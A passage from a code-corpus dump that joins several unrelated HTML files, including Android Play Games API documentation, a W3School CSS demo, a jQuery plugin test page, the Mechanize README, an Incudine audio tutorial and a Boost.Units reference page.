<li class="api apilevel-"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/OnInvitationReceivedListener.html">OnInvitationReceivedListener</a></li>
<li class="api apilevel-"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/Participant.html">Participant</a></li>
<li class="api apilevel-"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/Participatable.html">Participatable</a></li>
</ul>
</li>
<li><h2>Classes</h2>
<ul>
<li class="api apilevel-"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/InvitationBuffer.html">InvitationBuffer</a></li>
<li class="api apilevel-"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/InvitationEntity.html">InvitationEntity</a></li>
<li class="api apilevel-"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/ParticipantBuffer.html">ParticipantBuffer</a></li>
<li class="api apilevel-"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/ParticipantEntity.html">ParticipantEntity</a></li>
<li class="api apilevel-"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/ParticipantResult.html">ParticipantResult</a></li>
<li class="api apilevel-"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/ParticipantUtils.html">ParticipantUtils</a></li>
</ul>
</li>
</ul><br/>
</div><!-- end classes -->
</div><!-- end nav-panels -->
<div id="nav-tree" style="display:none" class="scroll-pane">
<div id="tree-list"></div>
</div><!-- end nav-tree -->
</div><!-- end swapper -->
<div id="nav-swap">
<a class="fullscreen">fullscreen</a>
<a href='#' onclick='swapNav();return false;'><span id='tree-link'>Use Tree Navigation</span><span id='panel-link' style='display:none'>Use Panel Navigation</span></a>
</div>
</div> <!-- end devdoc-nav -->
</div> <!-- end side-nav -->
<script type="text/javascript">
// init fullscreen based on user pref
var fullscreen = readCookie("fullscreen");
if (fullscreen != 0) {
if (fullscreen == "false") {
toggleFullscreen(false);
} else {
toggleFullscreen(true);
}
}
// init nav version for mobile
if (isMobile) {
swapNav(); // tree view should be used on mobile
$('#nav-swap').hide();
} else {
chooseDefaultNav();
if ($("#nav-tree").is(':visible')) {
init_default_navtree("../../../../../../../");
}
}
// scroll the selected page into view
$(document).ready(function() {
scrollIntoView("packages-nav");
scrollIntoView("classes-nav");
});
</script>
<div class="col-12" id="doc-col">
<div id="api-info-block">
<div class="sum-details-links">
Summary:
<a href="#pubmethods">Methods</a>
| <a href="#inhmethods">Inherited Methods</a>
| <a href="#" onclick="return toggleAllClassInherited()" id="toggleAllClassInherited">[Expand All]</a>
</div><!-- end sum-details-links -->
<div class="api-level">
</div>
</div><!-- end api-info-block -->
<!-- ======== START OF CLASS DATA ======== -->
<div id="jd-header">
public
static
interface
<h1 itemprop="name">Invitations.LoadInvitationsResult</h1>
implements
<a href="../../../../../../../reference/com/google/android/gms/common/api/Releasable.html">Releasable</a>
<a href="../../../../../../../reference/com/google/android/gms/common/api/Result.html">Result</a>
</div><!-- end header -->
<div id="naMessage"></div>
<div id="jd-content" class="api apilevel-">
<table class="jd-inheritance-table">
<tr>
<td colspan="1" class="jd-inheritance-class-cell">com.google.android.gms.games.multiplayer.Invitations.LoadInvitationsResult</td>
</tr>
</table>
<div class="jd-descr">
<h2>Class Overview</h2>
<p itemprop="articleBody">Result delivered when invitations have been loaded. Possible status codes include:
<ul>
<li><code><a href="../../../../../../../reference/com/google/android/gms/games/GamesStatusCodes.html#STATUS_OK">STATUS_OK</a></code> if data was successfully loaded and is up-to-date.
</li>
<li><code><a href="../../../../../../../reference/com/google/android/gms/games/GamesStatusCodes.html#STATUS_NETWORK_ERROR_NO_DATA">STATUS_NETWORK_ERROR_NO_DATA</a></code> if the device was unable to
retrieve any data from the network and has no data cached locally.</li>
<li><code><a href="../../../../../../../reference/com/google/android/gms/games/GamesStatusCodes.html#STATUS_NETWORK_ERROR_STALE_DATA">STATUS_NETWORK_ERROR_STALE_DATA</a></code> if the device was unable to
retrieve the latest data from the network, but has some data cached locally.</li>
<li><code><a href="../../../../../../../reference/com/google/android/gms/games/GamesStatusCodes.html#STATUS_CLIENT_RECONNECT_REQUIRED">STATUS_CLIENT_RECONNECT_REQUIRED</a></code> if the client needs to
reconnect to the service to access this data.</li>
<li><code><a href="../../../../../../../reference/com/google/android/gms/games/GamesStatusCodes.html#STATUS_INTERNAL_ERROR">STATUS_INTERNAL_ERROR</a></code> if an unexpected error occurred in the
service.</li>
</ul>
</p>
</div><!-- jd-descr -->
<div class="jd-descr">
<h2>Summary</h2>
<!-- ========== METHOD SUMMARY =========== -->
<table id="pubmethods" class="jd-sumtable"><tr><th colspan="12">Public Methods</th></tr>
<tr class="alt-color api apilevel-" >
<td class="jd-typecol"><nobr>
abstract
<a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/InvitationBuffer.html">InvitationBuffer</a></nobr>
</td>
<td class="jd-linkcol" width="100%"><nobr>
<span class="sympad"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/Invitations.LoadInvitationsResult.html#getInvitations()">getInvitations</a></span>()</nobr>
</td></tr>
</table>
<!-- ========== METHOD SUMMARY =========== -->
<table id="inhmethods" class="jd-sumtable"><tr><th>
<a href="#" class="toggle-all" onclick="return toggleAllInherited(this, null)">[Expand]</a>
<div style="clear:left;">Inherited Methods</div></th></tr>
<tr class="api apilevel-" >
<td colspan="12">
<a href="#" onclick="return toggleInherited(this, null)" id="inherited-methods-com.google.android.gms.common.api.Releasable" class="jd-expando-trigger closed"
><img id="inherited-methods-com.google.android.gms.common.api.Releasable-trigger"
src="../../../../../../../assets/images/triangle-closed.png"
class="jd-expando-trigger-img" /></a>
From interface
<a href="../../../../../../../reference/com/google/android/gms/common/api/Releasable.html">com.google.android.gms.common.api.Releasable</a>
<div id="inherited-methods-com.google.android.gms.common.api.Releasable">
<div id="inherited-methods-com.google.android.gms.common.api.Releasable-list"
class="jd-inheritedlinks">
</div>
<div id="inherited-methods-com.google.android.gms.common.api.Releasable-summary" style="display: none;">
<table class="jd-sumtable-expando">
<tr class="alt-color api apilevel-" >
<td class="jd-typecol"><nobr>
abstract
void</nobr>
</td>
<td class="jd-linkcol" width="100%"><nobr>
<span class="sympad"><a href="../../../../../../../reference/com/google/android/gms/common/api/Releasable.html#release()">release</a></span>()</nobr>
</td></tr>
</table>
</div>
</div>
</td></tr>
<tr class="api apilevel-" >
<td colspan="12">
<a href="#" onclick="return toggleInherited(this, null)" id="inherited-methods-com.google.android.gms.common.api.Result" class="jd-expando-trigger closed"
><img id="inherited-methods-com.google.android.gms.common.api.Result-trigger"
src="../../../../../../../assets/images/triangle-closed.png"
class="jd-expando-trigger-img" /></a>
From interface
<a href="../../../../../../../reference/com/google/android/gms/common/api/Result.html">com.google.android.gms.common.api.Result</a>
<div id="inherited-methods-com.google.android.gms.common.api.Result">
<div id="inherited-methods-com.google.android.gms.common.api.Result-list"
class="jd-inheritedlinks">
</div>
<div id="inherited-methods-com.google.android.gms.common.api.Result-summary" style="display: none;">
<table class="jd-sumtable-expando">
<tr class="alt-color api apilevel-" >
<td class="jd-typecol"><nobr>
abstract
<a href="../../../../../../../reference/com/google/android/gms/common/api/Status.html">Status</a></nobr>
</td>
<td class="jd-linkcol" width="100%"><nobr>
<span class="sympad"><a href="../../../../../../../reference/com/google/android/gms/common/api/Result.html#getStatus()">getStatus</a></span>()</nobr>
</td></tr>
</table>
</div>
</div>
</td></tr>
</table>
</div><!-- jd-descr (summary) -->
<!-- Details -->
<!-- XML Attributes -->
<!-- Enum Values -->
<!-- Constants -->
<!-- Fields -->
<!-- Public ctors -->
<!-- ========= CONSTRUCTOR DETAIL ======== -->
<!-- Protected ctors -->
<!-- ========= METHOD DETAIL ======== -->
<!-- Public methdos -->
<h2>Public Methods</h2>
<A NAME="getInvitations()"></A>
<div class="jd-details api apilevel-">
<h4 class="jd-details-title">
<span class="normal">
public
abstract
<a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/InvitationBuffer.html">InvitationBuffer</a>
</span>
<span class="sympad">getInvitations</span>
<span class="normal">()</span>
</h4>
<div class="api-level">
<div></div>
</div>
<div class="jd-details-descr">
<div class="jd-tagdata jd-tagdescr"><p></p></div>
<div class="jd-tagdata">
<h5 class="jd-tagtitle">Returns</h5>
<ul class="nolist"><li>The invitations that were requested. This is guaranteed to be non-null, though it
may be empty. The listener must close this object when finished.
</li></ul>
</div>
</div>
</div>
<!-- ========= METHOD DETAIL ======== -->
<!-- ========= END OF CLASS DATA ========= -->
<A NAME="navbar_top"></A>
<div id="footer" class="wrap" >
<div id="copyright">
Except as noted, this content is licensed under <a
href="http://www.apache.org/licenses/LICENSE-2.0">Apache 2.0</a>.
For details and restrictions, see the <a href="../../../../../../../license.html">
Content License</a>.
</div>
<div id="build_info">
Android GmsCore 1474901 r —
<script src="../../../../../../../timestamp.js" type="text/javascript"></script>
<script>document.write(BUILD_TIMESTAMP)</script>
</div>
<div id="footerlinks">
<p>
<a href="../../../../../../../about/index.html">About Android</a> |
<a href="../../../../../../../legal.html">Legal</a> |
<a href="../../../../../../../support.html">Support</a>
</p>
</div>
</div> <!-- end footer -->
</div> <!-- jd-content -->
</div><!-- end doc-content -->
</div> <!-- end body-content -->
</body>
</html>
|
Coding/W3School/W3CN/www.w3school.com.cn/tiy/tf2fd.html
|
platinhom/ManualHom
|
<!DOCTYPE html>
<html lang="zh-cn">
<!-- Mirrored from www.w3school.com.cn/tiy/t.asp?f=csse_padding-top_percent by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Dec 2015 00:36:40 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=GB2312" /><!-- /Added by HTTrack -->
<head>
<meta charset="utf-8" />
<meta name="robots" content="all" />
<meta name="author" content="w3school.com.cn" />
<link rel="stylesheet" type="text/css" href="tc.css" />
<title>W3School在线测试工具 V2</title>
</head>
<body id="editor">
<div id="wrapper">
<div id="header">
<h1>W3School TIY</h1>
<div id="ad">
<script type="text/javascript"><!--
google_ad_client = "pub-3381531532877742";
/* 728x90, tiy_big */
google_ad_slot = "7947784850";
google_ad_width = 728;
google_ad_height = 90;
//-->
</script>
<script type="text/javascript"
src="../../pagead2.googlesyndication.com/pagead/f.txt">
</script>
</div>
</div>
<form action="http://www.w3school.com.cn/tiy/v.asp" method="post" id="tryitform" name="tryitform" onSubmit="validateForm();" target="i">
<div id="butt">
<input type="button" value="提交代码" onClick="submitTryit()">
</div>
<div id="CodeArea">
<h2>编辑您的代码:</h2>
<textarea id="TestCode" wrap="logical">
<html>
<head>
<style type="text/css">
td
{
padding-top: 10%
}
</style>
</head>
<body>
<table border="1">
<tr>
<td>
这个表格单元拥有上内边距。
</td>
</tr>
</table>
</body>
<!-- Mirrored from www.w3school.com.cn/tiy/t.asp?f=csse_padding-top_percent by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Dec 2015 00:36:40 GMT -->
</html>
</textarea>
</div>
<input type="hidden" id="code" name="code" />
<input type="hidden" id="bt" name="bt" />
</form>
<div id="result">
<h2>查看结果:</h2>
<iframe frameborder="0" name="i" src="loadtextf2fd.asp?f=csse_padding-top_percent"></iframe>
</div>
<div id="footer">
<p>请在上面的文本框中编辑您的代码,然后单击提交按钮测试结果。<a href="../index-2.html" title="W3School 在线教程">w3school.com.cn</a></p>
</div>
</div>
<script type="text/javascript">
function submitTryit()
{
var t=document.getElementById("TestCode").value;
t=t.replace(/=/gi,"w3equalsign");
t=t.replace(/script/gi,"w3scrw3ipttag");
document.getElementById("code").value=t;
document.getElementById("tryitform").action="v.html";
validateForm();
document.getElementById("tryitform").submit();
}
function validateForm()
{
var code=document.getElementById("code").value;
if (code.length>5000)
{
document.getElementById("code").value="<h1>Error</h1>";
}
}
</script>
</body>
</html>
|
test/test.html
|
easytobook/weasely.js
|
<html>
<head>
<title>Test for the sticky div</title>
<style>
html, body{
overflow: hidden;
}
.slide {
-webkit-transition: all .30s ease-in-out;
-moz-transition: all .30s ease-in-out;
-o-transition: all .30s ease-in-out;
transition: all .30s ease-in-out;
-webkit-transform: translate3D(0px, 0px, 0px);
-ms-transform: translate3D(0px, 0px, 0px);
transform: translate3D(0px, 0px, 0px);
}
.slide-up {
-webkit-transform: translate3D(0px, -100%, 0px);
-ms-transform: translate3D(0px, -100%, 0px);
transform: translate3D(0px, -100%, 0px);
}
</style>
<script src="../bower_components/jquery/dist/jquery.js"></script>
<script src="../src/weasely.js"></script>
</head>
<body>
<button id="disable_weasely" > BOOm!!! </button>
<button id="enable_weasely" > POW!!!! </button>
<div id="wrapper" style="overflow:hidden; position:relative; height: 500px; margin: 100px; background: yellow;">
<div id="weasely-element" class="slide" style="z-index: 1; height: 50px; background: green; padding: 1px 0; position: absolute; width: 100%;">I'ma hide like a weasel!</div>
<div class="weasely-scroller" style="-webkit-overflow-scrolling: touch; overflow-y: auto; height:100%; position: relative;">
<div style="height: 5000px; background: yellow; border: 1px solid blue; margin-top: 50px;">
<p style="margin-top: 10px">Hello there !</p>
<p style="margin-top: 300px">Whoop!</p>
</div>
</div>
</div>
<script>
$('#weasely-element').weasely({
hideClass: 'slide-up'
});
ws = $('#weasely-element').data('weasely')
$('#disable_weasely').click(function(){
ws.off()
})
$('#enable_weasely').click(function(){
ws.on()
})
document.ontouchmove = function(event){
if(event.target.tagName == "BODY"){
event.preventDefault();
}
}
</script>
</body>
</html>
|
readme_files/ruby/125-readme.html
|
lalo/readme-fads
|
<div class="announce instapaper_body rdoc" data-path="README.rdoc" id="readme"><article class="markdown-body entry-content" itemprop="mainContentOfPage">
<h1>
<a name="user-content-mechanize-" class="anchor" href="#mechanize-" aria-hidden="true"><span class="octicon octicon-link"></span></a>Mechanize <a href="http://travis-ci.org/sparklemotion/mechanize"><img src="https://camo.githubusercontent.com/5541688642efe00ff56263f4c1d7cf7f71674d04/68747470733a2f2f7365637572652e7472617669732d63692e6f72672f737061726b6c656d6f74696f6e2f6d656368616e697a652e706e673f72766d3d312e392e33" data-canonical-src="https://secure.travis-ci.org/sparklemotion/mechanize.png?rvm=1.9.3" style="max-width:100%;"></a>
</h1>
<ul>
<li>
<p><a href="http://docs.seattlerb.org/mechanize">docs.seattlerb.org/mechanize</a></p>
</li>
<li>
<p><a href="https://github.com/sparklemotion/mechanize">github.com/sparklemotion/mechanize</a></p>
</li>
</ul><h2>
<a name="user-content-description" class="anchor" href="#description" aria-hidden="true"><span class="octicon octicon-link"></span></a>Description</h2>
<p>The Mechanize library is used for automating interaction with websites.
Mechanize automatically stores and sends cookies, follows redirects, and
can follow links and submit forms. Form fields can be populated and
submitted. Mechanize also keeps track of the sites that you have visited
as a history.</p>
<h2>
<a name="user-content-dependencies" class="anchor" href="#dependencies" aria-hidden="true"><span class="octicon octicon-link"></span></a>Dependencies</h2>
<ul>
<li>
<p>ruby 1.9.2 or newer</p>
</li>
<li>
<p><a href="http://nokogiri.rubyforge.org">nokogiri</a></p>
</li>
</ul><h2>
<a name="user-content-support" class="anchor" href="#support" aria-hidden="true"><span class="octicon octicon-link"></span></a>Support:</h2>
<p>The bug tracker is available here:</p>
<ul><li>
<p><a href="https://github.com/sparklemotion/mechanize/issues">github.com/sparklemotion/mechanize/issues</a></p>
</li></ul><h2>
<a name="user-content-examples" class="anchor" href="#examples" aria-hidden="true"><span class="octicon octicon-link"></span></a>Examples</h2>
<p>If you are just starting, check out the <a href="http://docs.seattlerb.org/mechanize/GUIDE_rdoc.html">GUIDE</a> or the
<a href="http://docs.seattlerb.org/mechanize/EXAMPLES_rdoc.html">EXAMPLES</a>
file.</p>
<h2>
<a name="user-content-developers" class="anchor" href="#developers" aria-hidden="true"><span class="octicon octicon-link"></span></a>Developers</h2>
<p>To run the tests for the first time:</p>
<pre>bundle install</pre>
<p>This will install all the required dependencies for running the tests. For
subsequent test runs:</p>
<pre>rake test</pre>
<p>You can also use <tt>autotest</tt> from the ZenTest gem to run tests.</p>
<p>See also Mechanize::TestCase to read about the built-in testing
infrastructure.</p>
<h2>
<a name="user-content-authors" class="anchor" href="#authors" aria-hidden="true"><span class="octicon octicon-link"></span></a>Authors</h2>
<p>Copyright © 2005 by Michael Neumann (mneumann@ntecs.de)</p>
<p>Copyright © 2006-2011:</p>
<ul>
<li>
<p><a href="http://tenderlovemaking.com">Aaron Patterson</a>
(aaronp@rubyforge.org)</p>
</li>
<li>
<p><a href="http://mike.daless.io">Mike Dalessio</a> (mike@csa.net)</p>
</li>
</ul><p>Copyright © 2011-2013:</p>
<ul>
<li>
<p><a href="http://blog.segment7.net">Eric Hodel</a> (drbrain@segment7.net)</p>
</li>
<li>
<p><a href="http://blog.akinori.org">Akinori MUSHA</a> (knu@idaemons.org)</p>
</li>
<li>
<p><a href="http://twitter.com/lee_jarvis">Lee Jarvis</a> (ljjarvis@gmail.com)</p>
</li>
</ul><p>This library comes with a shameless plug for employing me (<a href="http://tenderlovemaking.com/">Aaron</a>) programming Ruby, my
favorite language!</p>
<h2>
<a name="user-content-acknowledgments" class="anchor" href="#acknowledgments" aria-hidden="true"><span class="octicon octicon-link"></span></a>Acknowledgments</h2>
<p>This library was heavily influenced by its namesake in the Perl world. A
big thanks goes to <a href="http://petdance.com">Andy Lester</a>, the
author of the original Perl module WWW::Mechanize which is available <a href="http://search.cpan.org/dist/WWW-Mechanize/">here</a>. Ruby Mechanize
would not be around without you!</p>
<p>Thank you to Michael Neumann for starting the Ruby version. Thanks to
everyone who's helped out in various ways. Finally, thank you to the
people using this library!</p>
<h2>
<a name="user-content-license" class="anchor" href="#license" aria-hidden="true"><span class="octicon octicon-link"></span></a>License</h2>
<p>This library is distributed under the MIT license. Please see the <a href="http://docs.seattlerb.org/mechanize/LICENSE_rdoc.html">LICENSE</a>
file.</p></article></div>
|
doc/html/tutorial_cmd.html
|
titola/incudine
|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="incudine.css" />
<title>Incudine Command</title>
</head>
<body>
<div id="content">
<table class="navtutor">
<tr>
<th class="center">Incudine Command</th>
</tr>
</table>
<hr>
<p>
Incudine is also the name of a standalone executable. Please consult the
<code>INSTALL</code> file if you'd like to install it.
</p>
<p>
Here is a basic tutorial to introduce the command.
</p>
<pre class="src src-sh">mkdir incudine_tut
<span style="color: #b0c4de;">cd</span> !$
<span style="color: #ff7f24;"># </span><span style="color: #ff7f24;">usage</span>
incudine -h
<span style="color: #ff7f24;"># </span><span style="color: #ff7f24;">Simple files for the test</span>
cat >foo.cudo <<'---'
(dsp! simple (freq db (env envelope) gate)
(stereo (* (envelope env gate 1 #'free)
(sine freq (db->linear db) 0))))
---
cat >quux.rego <<'---'
with (env1 (make-adsr .1 .09 .9 .5))
0 simple 440 -14 env1 1
0 simple 220 -20 env1 1
0.5 simple 225 -26 env1 1
1 simple 448 -14 env1 1
3 simple 450 -20 (make-adsr 1 .2 .7 1 :curve :sin) 1
5 set-control 0 :gate 0
---</pre>
<p>
Note: the package is <code>INCUDINE.SCRATCH</code>
(nickname <code>SCRATCH</code>) by default.
</p>
<pre class="src src-sh">incudine foo.cudo -s quux.rego</pre>
<p>
It remembers orchestra+score in Csound, however we can use multiple
files and a lisp file can contain what you want, not necessarily
specific code for Incudine. A rego file (see <a href="tutorial_03.html#rego-file">Getting Start - Part 3</a>)
is transformed in an intermediate lisp file containing also the code
to execute the score in realtime or to write a soundfile to disk.
</p>
<p>
We get a soundfile `quux.wav' and two FASL called `foo.fasl' and
`quux.fasl'. If we run again the previous command line…
</p>
<pre class="src src-sh">incudine foo.cudo -s quux.rego</pre>
<p>
… the execution is faster, because we are using the compiled files.
A source file is re-compiled if:
</p>
<ol>
<li>the source is modified after the compilation</li>
<li>the command line arguments before the name of the source file are changed</li>
</ol>
<p>
There aren't options before foo.cudo, therefore it also works without
re-compilation:
</p>
<pre class="src src-sh">incudine foo quux</pre>
<p>
The sound is truncated after 5 beats; we can add some padding:
</p>
<pre class="src src-sh">incudine foo.cudo --pad 1.2 -s quux.rego</pre>
<p>
and only <code>quux.rego</code> is re-compiled, because the new argument
<code>`–pad 1.2'</code> doesn't precede <code>foo.cudo</code>.
</p>
<p>
Changing the name of the output file:
</p>
<pre class="src src-sh">incudine foo.cudo -o <span style="color: #ffa07a;">"battimenti zincati.wav"</span> -s quux.rego</pre>
<p>
Score from standard input:
</p>
<pre class="src src-sh">echo '0 simple 1000 -6 (make-perc .1 1.5) 1' \
| incudine foo.cudo -d 2 -s - > rego-from-stdin-1.wav
cat quux.rego | incudine foo.cudo -o rego-from-stdin-2.wav -s -</pre>
<p>
Redirection of the audio to the standard output:
</p>
<pre class="src src-sh">incudine foo.cudo --pad 1.2 -o - -H ircam -F float <span style="color: #ffa07a;">\</span>
-s quux.rego | sox - quux.wv</pre>
<p>
We can also decide to use an absolute duration for the output file:
</p>
<pre class="src src-sh">incudine foo.cudo -d 6.5 -s quux.rego</pre>
<p>
For realtime, please start Jack on Linux and set the rt priorities of
Incudine. You can change them in <code>$HOME/.incudinerc</code> or use
the options
</p>
<pre class="example">
--rt-priority prio for rt thread (default: 68)
--nrt-priority prio for nrt thread (default: 60)
--receiver-priority prio for receiver thread (default: 63)</pre>
<p>
In my case, jackd is run with <code>`-R -P70'</code>.
</p>
<pre class="src src-sh">incudine foo.cudo -d 6.5 -R -s quux.rego</pre>
<p>
We can use multiple files and switch from realtime (-R) to non-rt (-N)
and vice versa. In the following example, quux is in realtime and bar
writes a soundfile to disk.
</p>
<pre class="src src-sh">cp quux.rego bar.rego
incudine foo.cudo -d 6.5 -R -s quux.rego -N -s bar.rego</pre>
<p>
Incudine uses Erik de Castro Lopo's libsndfile to read/write a soundfile
from/to disk.
</p>
<pre class="src src-sh">incudine --header-type-list
incudine --data-format-list</pre>
<p>
Header type and format of the sample are respectively `wav' (`aiff' on
big endian machines) and `pcm-24'.
</p>
<p>
The following example produces a flac file <code>quux.flac</code>
</p>
<pre class="src src-sh">incudine foo.cudo --pad 1.2 -H flac -s quux.rego</pre>
<p>
and a ogg file <code>quux.ogg</code>
</p>
<pre class="src src-sh">incudine foo.cudo --pad 1.2 -H ogg -F vorbis -s quux.rego</pre>
<p>
There is the possibility to add metadata. It is important to notice the
comment in <code>sndfile.h</code>, the c header of libsndfile:
</p>
<blockquote>
<p>
… Not all file types support this and even the file types which
support one, may not support all string types.
</p>
</blockquote>
<p>
Example:
</p>
<pre class="src src-sh">incudine foo.cudo --pad 1.2 --title <span style="color: #ffa07a;">"Passame n'elettrodo"</span> <span style="color: #ffa07a;">\</span>
--artist <span style="color: #ffa07a;">"Fabro Cadabro Band"</span> -s quux.rego
sndfile-metadata-get --str-{title,artist} quux.wav</pre>
<p>
Often we want manipulate an input file. The next example shows how to
use incudine for the convolution between two soundfiles. We put in
conv.cudo the code to parse the user options and the definition of the
DSP for the convolver.
</p>
<pre class="src src-sh">cat > conv.cudo <<'---'
(defvar *pvbuf*
(let ((buf (buffer-load (read-arg 1 nil))))
(cond (buf (make-part-convolve-buffer buf 2048))
(t (msg error "Failed to open the IR")
(exit 1)))))
(defvar *scale* (sample (or (read-arg 2) 1)))
(dsp! convolve ()
(with-samples ((scale *scale*))
(foreach-channel
(cout (* scale (part-convolve (audio-in 0) *pvbuf*))))))
---
<span style="color: #ff7f24;"># </span><span style="color: #ff7f24;">Trivial rego file</span>
<span style="color: #b0c4de;">echo</span> 0 convolve > forge.rego</pre>
<p>
I use `–' to separate toplevel and user options. reverb.wav is
the impulse response of a stereo reverb, sampled with sample rate
96 kHz, and voice.wav is an input file. The second user option is a
scale factor for the output.
</p>
<pre class="src src-sh">incudine conv.cudo -i voice.wav -r 96000 -s forge.rego -- reverb.wav 0.4</pre>
<p>
A function for the shell is immediate.
</p>
<pre class="src src-sh"><span style="color: #ff7f24;"># </span><span style="color: #ff7f24;">Usage: convolve inputfile irfile [scale] [srate] [pad]</span>
<span style="color: #87cefa;">convolve</span>() { incudine conv.cudo -i <span style="color: #ffa07a;">"$1"</span> ${<span style="color: #eedd82;">4</span>:+-r $<span style="color: #eedd82;">4</span>} --pad ${<span style="color: #eedd82;">5</span>:-2} <span style="color: #ffa07a;">\</span>
-s forge.rego -- <span style="color: #ffa07a;">"$2"</span> <span style="color: #ffa07a;">"$3"</span> ; }
convolve voice.wav reverb.wav 0.4 96000
convolve voice48.wav ir48.wav 0.53 48000 2.5
<span style="color: #ff7f24;"># </span><span style="color: #ff7f24;">Remove the traces</span>
<span style="color: #b0c4de;">unset</span> -f convolve</pre>
<p>
If you have created the incudine command with the support for LV2, you
can use LV2 plugins in your scripts. A trivial example:
</p>
<pre class="src src-sh">cat > amp.cudo <<'---'
(lv2->vug "http://plugin.org.uk/swh-plugins/amp" swh.amp)
(dsp! amp-test (gain)
(stereo (swh.amp gain (white-noise 1))))
---
cat > amp-test.rego <<'---'
0 amp-test -6 :id 1
1 set-control 1 :gain -12
2 set-control 1 :gain -4
3 set-control 1 :gain -20
4 set-control 1 :gain -5
5 free 1
---
incudine amp.cudo -s amp-test.rego</pre>
<p>
Another example, where a multi output plugin returns a FRAME:
</p>
<pre class="src src-sh">cat > gverb.cudo <<'---'
(lv2->vug "http://plugin.org.uk/swh-plugins/gverb" gverb)
(dsp! gverb-test (room-size rev-time damping input-bw dry early-level
tail-level scale)
(frame-out (gverb room-size rev-time damping input-bw
dry early-level tail-level (audio-in 0))
2 0 scale))
---
cat > gverb-test.rego <<'---'
0 gverb-test 80 8 0.5 0.75 -70 0 -17 .4 :id 1
3 set-controls 1 :freq .3 :dt .05 :dry -77 :rev-time 30 :tail-level -7
6 set-control 1 :rev-time 1
---
incudine gverb.cudo -i voice.wav --pad 3 -r 96000 -s gverb-test.rego</pre>
<p>
If you have also created the incudine command with the support for
LADSPA, here is an example to use LADSPA plugins:
</p>
<pre class="src src-sh">cat > plate-rev.cudo <<'---'
(ladspa->vug "caps" "Plate" plate-reverb)
(dsp! plate-reverb-test (trig-freq input-decay input-scale bw tail damping blend)
"Test of the Plate reverb developed by Tim Goetze."
(with-samples ((in (* (decay (impulse trig-freq) input-decay)
(white-noise input-scale))))
;; PLATE-REVERB returns a frame because there are two outputs.
(multiple-sample-bind (l r)
(plate-reverb bw tail damping blend in)
(out l r))))
---
cat > plate-rev-test.rego <<'---'
0 plate-reverb-test 4 .165 .5 .75 .5 .25 .25
2 set-controls 1 :trig-freq 1.5 :tail .8 :dumping .1 :blend .5
5 set-control 1 :trig-freq .1
8 free 1
---
incudine plate-rev.cudo -v -s plate-rev-test.rego
</pre>
<hr>
<table class="navtutor">
<tr>
<td style="width: 20%" class="left">
<a href="tutorial_01.html">Getting Started with Incudine</a>
</td>
<td style="width: 60%" class="center"><a href="index.html">Home</a></td>
<td style="width: 20%" class="right"></td>
</tr>
</table>
</div>
<div id="postamble">
<a href="http://sourceforge.net/projects/incudine">Sourceforge project page</a>
</div>
</body>
</html>
|
myodd/boost/doc/html/boost/units/us/yard_base_unit.html
|
FFMG/myoddweb.piger
|
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII">
<title>Struct yard_base_unit</title>
<link rel="stylesheet" href="../../../../../doc/src/boostbook.css" type="text/css">
<meta name="generator" content="DocBook XSL Stylesheets V1.79.1">
<link rel="home" href="../../../index.html" title="The Boost C++ Libraries BoostBook Documentation Subset">
<link rel="up" href="../../../boost_units/Reference.html#header.boost.units.base_units.us.yard_hpp" title="Header <boost/units/base_units/us/yard.hpp>">
<link rel="prev" href="../base_uni_idm45443285482160.html" title="Struct base_unit_info<us::ton_base_unit>">
<link rel="next" href="../../../boost_units/Installation.html" title="Installation">
</head>
<body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF">
<table cellpadding="2" width="100%"><tr>
<td valign="top"><img alt="Boost C++ Libraries" width="277" height="86" src="../../../../../boost.png"></td>
<td align="center"><a href="../../../../../index.html">Home</a></td>
<td align="center"><a href="../../../../../libs/libraries.htm">Libraries</a></td>
<td align="center"><a href="http://www.boost.org/users/people.html">People</a></td>
<td align="center"><a href="http://www.boost.org/users/faq.html">FAQ</a></td>
<td align="center"><a href="../../../../../more/index.htm">More</a></td>
</tr></table>
<hr>
<div class="spirit-nav">
<a accesskey="p" href="../base_uni_idm45443285482160.html"><img src="../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../../../boost_units/Reference.html#header.boost.units.base_units.us.yard_hpp"><img src="../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../../index.html"><img src="../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="../../../boost_units/Installation.html"><img src="../../../../../doc/src/images/next.png" alt="Next"></a>
</div>
<div class="refentry">
<a name="boost.units.us.yard_base_unit"></a><div class="titlepage"></div>
<div class="refnamediv">
<h2><span class="refentrytitle">Struct yard_base_unit</span></h2>
<p>boost::units::us::yard_base_unit</p>
</div>
<h2 xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" class="refsynopsisdiv-title">Synopsis</h2>
<div xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" class="refsynopsisdiv"><pre class="synopsis"><span class="comment">// In header: <<a class="link" href="../../../boost_units/Reference.html#header.boost.units.base_units.us.yard_hpp" title="Header <boost/units/base_units/us/yard.hpp>">boost/units/base_units/us/yard.hpp</a>>
</span>
<span class="keyword">struct</span> <a class="link" href="yard_base_unit.html" title="Struct yard_base_unit">yard_base_unit</a> <span class="special">:</span> <span class="keyword">public</span> boost::units::base_unit< yard_base_unit, si::meter_base_unit::dimension_type,-501 >
<span class="special">{</span>
